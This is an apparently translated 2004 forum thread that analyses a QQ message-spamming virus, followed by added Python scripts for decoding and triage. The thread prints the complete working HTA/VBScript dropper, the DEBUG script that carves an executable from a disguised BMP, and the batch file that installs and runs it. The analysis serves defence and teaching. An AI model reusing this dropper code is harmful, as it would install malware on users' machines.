Poster: wangsong [wangsong], forum user
Author: 飞天剑客
http://www.wwwzsl.com

There are many kinds of QQ virus on the net and they are very common; I believe everyone has caught one, and I used to get this kind of virus often myself. This is some research I did on one QQ virus; if anything is wrong I hope you will point it out. One day a friend sent me a URL saying it was his website. I opened it and, what do you know, it was clearly an under-18-not-allowed site (you all guessed it). Once opened, two dialog boxes popped up and several more web pages opened at the same time (those are probably the ones that download the virus). From then on my QQ had a little tail, sending out "my photos", "my secrets" ......... lots of stuff anyway. Nowadays they all use an IE vulnerability to download, then use VBS to run this, modify that, and finally execute it. I don't know VBS, so there will inevitably be mistakes. Right-click was not disabled, so naturally I looked at the page source. Its content:

```html
<object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
<HTA:APPLICATION caption="no" border="none" windowState="minimize" >
<script LaNGUAGE="VBScript">
Set g_fs = CreateObject("Scripting.FileSystemObject")
Set tf = g_fs.CreateTextFile("c:\win.hta",true)   ' create the file
tf.write "<HTA:APPLICATION caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& " >" &chr(13)&chr(10)
tf.write "<object id='wsh' cl"& chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10)
tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10)
tf.write "on error resume next"&chr(13)&chr(10)
tf.write "window.moveTo 0,0"&chr(13)&chr(10)
tf.write "window.resizeTo 0,0 "&chr(13)&chr(10)
tf.write "dim exepath"&chr(13)&chr(10)
tf.write "Function Search(objFolder) "&chr(13)&chr(10)
tf.write "Dim objSubFolder"&chr(13)&chr(10)
tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10)
tf.write "If InStr(1, objfile.name, " & CHR(34)& "lhxyexe" & CHR(34)& ", vbtextcompare) then"&chr(13)&chr(10)
tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10)
tf.write "filecp.copy (exepath)"&chr(13)&chr(10)
tf.write "exit for"&chr(13)&chr(10)
tf.write "End If"&chr(13)&chr(10)
tf.write "Next "&chr(13)&chr(10)
tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10)
tf.write "Search objSubFolder"&chr(13)&chr(10)
tf.write "Next"&chr(13)&chr(10)
tf.write "End Function"&chr(13)&chr(10)
tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)& ")"&chr(13)&chr(10)
tf.write "str=WSH.regread(" & CHR(34)& "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"&chr(13)&chr(10)
tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10)
tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10)
tf.write "exepath=othisfolder.path & "& chr(34) & "win.exe" & chr(34) &chr(13)&chr(10)
tf.write "search tempfolder"&chr(13)&chr(10)
tf.write "wsh.run (exepath)"&chr(13)&chr(10)
tf.write "wsh.run " & CHR(34)& "command.com /c del c:\win.hta" & CHR(34)& " ,0"&chr(13)&chr(10)   ' delete the file after it has run
tf.write "window.close()"&chr(13)&chr(10)
tf.write "<" &chr(47)& "script>"&chr(13)&chr(10)
tf.close
wsh.run "c:\win.hta",0
window.close ()
</script>
```

That is the original code above (I added a few comments). What it does is create the file c:\win.hta, write content into it, run it once after writing, and then delete it. Now look at the win.hta file it creates; its content is as follows:

```html
<SCRIPT LANGUAGE="VBScript">
'by 陈经韬.2003.11.http://www.138soft.com,lovejingtao@21cn.com
Option Explicit
Dim FSO,WSH,CACHE,str,sucess
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE=wsh.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")   ' build the file path
sucess=0
sub FF
SearchBMPFile fso.GetFolder(CACHE),"ClientQQS[1].bmp"   ' the original virus file
if sucess=0 then SearchBMPFile fso.GetFolder(CACHE),"ClientQQS[2].bmp"
End sub
Function SearchBMPFile(Folder,fname)
Dim SubFolder,File,Lt,tmp,winsys
str=FSO.GetParentFolderName(folder) & "\" & folder.name & "\" & fname
if FSO.FileExists(str) then
tmp=fso.GetSpecialFolder(2) & "\"
winsys=fso.GetSpecialFolder(1) & "\"
set File=FSO.GetFile(str)
File.Copy(tmp & "tmp.dat")
On Error Resume Next
File.Delete
if FSO.FileExists(str) then exit function
set Lt=FSO.CreateTextFile(tmp & "tmp.in")
Lt.WriteLine("rbx")
Lt.WriteLine("0")
Lt.WriteLine("rcx")
'the number below is the size of the EXE file, in hex
Lt.WriteLine("8000")
Lt.WriteLine("w136")
Lt.WriteLine("q")
Lt.Close
set Lt=FSO.CreateTextFile(tmp & "tmp.bat")
Lt.WriteLine("@echo off")
Lt.WriteLine("debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine("copy " & tmp & "tmp.dat " & winsys & "ClientQQS.exe>" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.dat >" & tmp & "tmp.out")
Lt.WriteLine("del " & tmp & "tmp.in >" & tmp & "tmp.out")
Lt.WriteLine(winsys & "ClientQQS.exe")
Lt.Close
WSH.Run tmp & "tmp.bat",false,6   ' tmp.bat has been created and written; now run it
On Error Resume Next
'FSO.GetFile(tmp & "tmp.bat").Delete
sucess=1
msgbox "好像好爽的感觉......"   ' "feels kind of great......"
end if
If Folder.SubFolders.Count <> 0 Then
For Each SubFolder In Folder.SubFolders
SearchBMPFile SubFolder,fname
Next
End If
End Function
</script>
<SCRIPT language=JavaScript>
function F()
{
FF();
if (sucess==0) setTimeout("F()", 2000);
}
setTimeout("F()", 2000);
</SCRIPT>
<body>
<!-- "Connecting to server.... please do not close!" -->
正在连接服务器....请不要关闭!
</body>
</html>
```

What this does is create a tmp.bat file (a .bat file is a batch file). Find it, open it and see what is inside:

```bat
@echo off
debug D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.dat <D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.in >D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.out
copy D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.dat D:\WINNT\system32\ClientQQS.exe>D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.out
del D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.dat >D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.out
del D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.in >D:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp.out
D:\WINNT\system32\ClientQQS.exe
```

Haha!!!!! Now you see: it uses DEBUG to turn tmp.dat into the file ClientQQS.exe, then copies it into the system directory and runs it. The file that sends the messages is probably this one.

The registry is another place these files always need to touch, so first check whether there is anything suspicious under the RUN keys. Under HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\currentversion\RunServices\ and HKEY_LOCAL_USER\SOFTWARE\MICROSOFT\WINDOWS\currentversion\run\ I found a suspicious file, QQINFO.EXE. Where did this extra file come from, and what does it do? Later I found out it is just ClientQQS.exe under a different name.

OK, so the overall picture from download to execution should be clear now: first someone sends you a URL; once you open it, it uses an IE vulnerability to download a .bmp to the local hard disk, then uses VBS to create the win.hta file. win.hta in turn creates tmp.bat, and at the same time turns ClientQQS[1].bmp into a DAT file; tmp.bat then calls DEBUG to convert ClientQQS[1].bmp into ClientQQS.exe and copies it into the %systemroot%\system32\ folder, and ClientQQS.exe copies itself into the winnt folder renamed as QQINFO.EXE, and finally runs QQINFO.EXE. I'm sure you know how to clean it up now, so I won't say more.
OP, posted 04-04-21 15:19
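An added example (mine, not from the post or from the virus author): a small Python script that reconstructs what the first-stage HTA writes into c:\win.hta without running it, by statically evaluating the string literals, chr(n) calls and & operators in each tf.write line. The sample input is four of the tf.write lines from the HTA in the post; the chr(97) splice that hides the word classid, CHR(34) standing in for every quote, and the chr(47) in the closing script tag are exactly the tricks that defeat a signature written against the raw page text, and they fall out of the evaluation trivially.

```python
import re

# Constructed sample input: four tf.write lines copied from the first-stage HTA
# in the post above. The real dropper has many more, but these show the tricks
# it uses: chr(97) splitting "classid", CHR(34) for quotes, chr(13)&chr(10)
# for line breaks and chr(47) for the "/" in the closing script tag.
DROPPER_LINES = r'''
tf.write "<object id='wsh' cl"& chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10)
tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10)
tf.write "wsh.run " & CHR(34)& "command.com /c del c:\win.hta" & CHR(34)& " ,0"&chr(13)&chr(10)
tf.write "<" &chr(47)& "script>"&chr(13)&chr(10)
'''

# The only pieces of VBScript grammar the dropper's write statements use.
TOKEN = re.compile(r'''
    "((?:[^"]|"")*)"            # string literal; "" inside is an escaped quote
  | chr\s*\(\s*(\d+)\s*\)       # chr(n) / CHR(n)
  | (&)                         # string concatenation
  | (\s+)                       # whitespace between tokens
''', re.VERBOSE | re.IGNORECASE)


def eval_vbs_concat(expr):
    """Statically evaluate an expression built only from string literals,
    chr(n) calls and the & operator, without touching a script engine.
    Anything else raises, so the tool never silently produces wrong output."""
    out = []
    pos = 0
    while pos < len(expr):
        m = TOKEN.match(expr, pos)
        if m is None:
            raise ValueError(f"unsupported VBScript at column {pos}: {expr[pos:pos + 20]!r}")
        literal, chr_code, _amp, _ws = m.groups()
        if literal is not None:
            out.append(literal.replace('""', '"'))
        elif chr_code is not None:
            out.append(chr(int(chr_code)))
        pos = m.end()
    return "".join(out)


def unpack_writes(script_text, stream="tf"):
    """Return the exact text the dropper pushes through <stream>.write, in
    order: that is the second-stage file it drops, ready to read or scan."""
    pattern = re.compile(r'^\s*' + re.escape(stream) + r'\.write\s+(.*?)\s*$',
                         re.IGNORECASE)
    pieces = []
    for line in script_text.splitlines():
        m = pattern.match(line)
        if m:
            pieces.append(eval_vbs_concat(m.group(1)))
    return "".join(pieces)


if __name__ == "__main__":
    # Prints the reconstructed fragment of win.hta with its CRLF line breaks.
    print(unpack_writes(DROPPER_LINES), end="")
```

Feed it the whole first-stage script instead of the four sample lines and you get the complete dropped file, which is a safer way to read a dropper than opening it in mshta.exe to see what lands on disk.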
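Another added example, not part of the post: what the tmp.in script actually tells DEBUG to do. DEBUG loads a file that is not named .EXE at offset 100h of its segment; rbx and rcx set BX:CX to a byte count (0x8000 here, the "size of the EXE" the script's own comment mentions); and w136 writes that many bytes starting at address 136h back to the file named on DEBUG's command line, tmp.dat, overwriting it. Address 136h is file offset 0x36 = 54, and 54 bytes is exactly a BITMAPFILEHEADER plus a BITMAPINFOHEADER, so my reading (an inference, not something the post states) is that ClientQQS[1].bmp is a genuine BMP header with the EXE glued behind it, which is how it sits in the IE cache looking like an image. The script below emulates that carve on a constructed sample (a fake 0x8000-byte MZ payload behind a minimal BMP header; ClientQQS.exe itself is not on the page) and adds a quick triage check for such wrappers.

```python
import struct

# tmp.in exactly as the win.hta in the post writes it.
TMP_IN = "rbx\n0\nrcx\n8000\nw136\nq\n"

DEBUG_LOAD_OFFSET = 0x100   # DEBUG loads a non-.EXE file at CS:0100
BMP_HEADERS_SIZE = 14 + 40  # BITMAPFILEHEADER + BITMAPINFOHEADER = 0x36 bytes


def parse_debug_script(script):
    """Interpret the subset of DEBUG commands the dropper feeds on stdin.

    rbx / rcx : the next line is the new register value in hex (DEBUG prompts for it)
    w <addr>  : write BX:CX bytes starting at <addr> back to the file named on
                DEBUG's command line, overwriting it
    q         : quit
    Returns (byte_count, file_offset), with file_offset = addr - 0x100.
    """
    lines = [ln.strip() for ln in script.splitlines() if ln.strip()]
    regs = {"bx": 0, "cx": 0}
    write_addr = None
    i = 0
    while i < len(lines):
        cmd = lines[i].lower()
        if cmd in ("rbx", "rcx"):
            regs[cmd[1:]] = int(lines[i + 1], 16)
            i += 2
            continue
        if cmd.startswith("w"):
            write_addr = int(cmd[1:].strip() or "100", 16)
        elif cmd == "q":
            break
        else:
            raise ValueError(f"unsupported DEBUG command: {cmd!r}")
        i += 1
    if write_addr is None:
        raise ValueError("script never issues a w command")
    byte_count = (regs["bx"] << 16) | regs["cx"]
    return byte_count, write_addr - DEBUG_LOAD_OFFSET


def carve(data, script=TMP_IN):
    """Reproduce what `debug tmp.dat < tmp.in` leaves behind in tmp.dat."""
    count, offset = parse_debug_script(script)
    return data[offset:offset + count]


def looks_like_bmp_wrapped_exe(data):
    """Triage check for a cached 'image': BMP magic in front, MZ right
    behind the 54-byte headers."""
    return data[:2] == b"BM" and data[BMP_HEADERS_SIZE:BMP_HEADERS_SIZE + 2] == b"MZ"


def make_bmp_wrapped(payload, width=1, height=1):
    """Constructed sample only: glue a minimal 24-bit BMP header onto an
    arbitrary payload, which on my reading of w136 is how the .bmp was built."""
    info_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                           len(payload), 0, 0, 0, 0)
    file_hdr = struct.pack("<2sIHHI", b"BM", 14 + 40 + len(payload), 0, 0, 14 + 40)
    return file_hdr + info_hdr + payload


# Constructed stand-in for the real EXE: 0x8000 bytes beginning with an MZ
# header, matching the "8000" the script loads into CX.
_STUB = b"MZ" + b"This program cannot be run in DOS mode."
FAKE_EXE = _STUB + b"\x90" * (0x8000 - len(_STUB))
SAMPLE_BMP = make_bmp_wrapped(FAKE_EXE)

if __name__ == "__main__":
    count, offset = parse_debug_script(TMP_IN)
    print(f"w136 -> file offset 0x{offset:x} ({offset} bytes), length 0x{count:x}")
    print("BMP-wrapped EXE:", looks_like_bmp_wrapped_exe(SAMPLE_BMP))
    print("carved payload starts with:", carve(SAMPLE_BMP)[:2])
```

Two things worth keeping in mind when reusing this: the carve is only as good as the hard-coded length in tmp.in (any trailing bytes past 0x8000 are dropped, anything shorter is padded with whatever DEBUG had in memory), and the triage check is deliberately narrow; a wrapper that pads the BMP headers or uses a different image format will need the offset adjusted.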
Reply: ghame [ghame], forum user
Pretty detailed analysis, and original too; +1 for support!
Floor B1, posted 04-04-21 18:58
Reply: hkcc [hkcc], forum user
Bump bump bump~
Floor B2, posted 04-04-24 00:10
Reply: EvSpirit [aeolian], forum user
I remember there is a dedicated removal tool for this one!
Floor B3, posted 04-04-24 20:23
Reply: wangsong [wangsong], forum user
But this way you know how it works, don't you?
Floor B4, posted 04-04-24 22:17
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
Forum software written by NetDemon
粤ICP备05087286号